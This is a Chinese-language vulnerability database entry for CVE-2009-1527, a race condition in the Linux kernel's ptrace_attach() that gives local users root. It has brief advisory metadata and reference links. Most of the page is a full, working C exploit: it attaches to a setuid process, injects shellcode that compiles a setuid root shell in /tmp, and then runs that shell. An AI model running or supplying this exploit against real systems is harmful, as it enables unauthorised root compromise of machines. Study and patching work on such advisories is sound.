Linux Kernel ptrace_attach()函数本地权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117754 漏洞类型 竞争条件
发布时间 2009-05-13 更新时间 2009-05-27
CVE编号 CVE-2009-1527 CNNVD-ID CNNVD-200905-061
漏洞平台 Linux CVSS评分 6.9
|漏洞来源
https://www.exploit-db.com/exploits/8673
https://www.securityfocus.com/bid/34799
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-061
|漏洞详情
Linuxkernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。NFSv4implementation是其中的一个分布式文件系统协议。LinuxKernel在与execve()同步时ptrace_attach()使用了不充分的互斥体,本地用户可以通过附加到setuid进程获得root用户权限提升。
|漏洞EXP
/*
ptrace_attach privilege escalation exploit by s0m3b0dy

[*] tested on Gentoo 2.6.29rc1

grataz:
Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...

email: s0m3b0dy1 (at) gmail.com
*/

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
char shellcode[] =
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99" 
"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
"echo \"#include <stdio.h>\nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";
struct user_regs_struct322 {
        unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        unsigned long orig_eax, eip;
        unsigned short cs, __cs;
        unsigned long eflags, esp;
        unsigned short ss, __ss;
};

main()
{
struct user_regs_struct322  regs;
struct stat buf;
int i,o;
unsigned long * src;
unsigned long * dst;
char *env[2];
env[0]="/usr/bin/gpasswd";  // some suid file
env[1]=0;
if((o=fork()) == 0)
{
execve(env[0],env,0);
exit(0);
}
if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
{
printf("\n[-] Attach\n");
exit(0);
}
 wait((int *)0);
if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){
                printf("\n[-] read registers\n");
		exit(0);
}
printf( "[+] EIP - 0x%08lx\n", regs.eip);
dst= (unsigned long *) regs.eip;
src = (unsigned long *) shellcode;
for(i=0;i<sizeof(shellcode) -1;i+=4)
if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
                       printf("\n[-] write shellcode\n");
			exit(0);
}
ptrace(PTRACE_CONT, o, 0, 0);
ptrace(PTRACE_DETACH,o,0,0);
printf("[+] Waiting for root...\n");
sleep(2);
if(!stat("/tmp/.exp",&buf))
{
printf("[+] Executing suid shell /tmp/.exp...\n"); 
execv("/tmp/.exp",0);
}
else
{
printf("[-] Damn no r00t here :(\n");
}
return 0;
}

// milw0rm.com [2009-05-13]
|受影响的产品
rPath rPath Linux 2 rPath Appliance Platform Linux Service 2 rPath Appliance Platform Linux Service 1 Linux kernel 2.6.29
|参考资料

来源:VUPEN
名称:ADV-2009-1236
链接:http://www.vupen.com/english/advisories/2009/1236
来源:git.kernel.org
链接:http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=cad81bc2529ab8c62b6fdc83a1c0c7f4a87209eb
来源:XF
名称:linux-kernel-ptraceattach-code-execution(50293)
链接:http://xforce.iss.net/xforce/xfdb/50293
来源:BID
名称:34799
链接:http://www.securityfocus.com/bid/34799
来源:BUGTRAQ
名称:20090516rPSA-2009-0084-1kernel
链接:http://www.securityfocus.com/archive/1/archive/1/503610/100/0/threaded
来源:OSVDB
名称:54188
链接:http://www.osvdb.org/54188
来源:MLIST
名称:[oss-security]20090504CVErequest:kernel:ptrace_attach:fixtheusageof->cred_exec_mutex
链接:http://www.openwall.com/lists/oss-security/2009/05/04/2
来源:www.kernel.org
链接:http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.30-rc4
来源:wiki.rpath.com
链接:http://wiki.rpath.com/Advisories:rPSA-2009-0084
来源:SECUNIA
名称:35120
链接:http://secunia.com/advisories/35120
来源:SECUNIA
名称:34977
链接:http://secunia.com/advisories/34977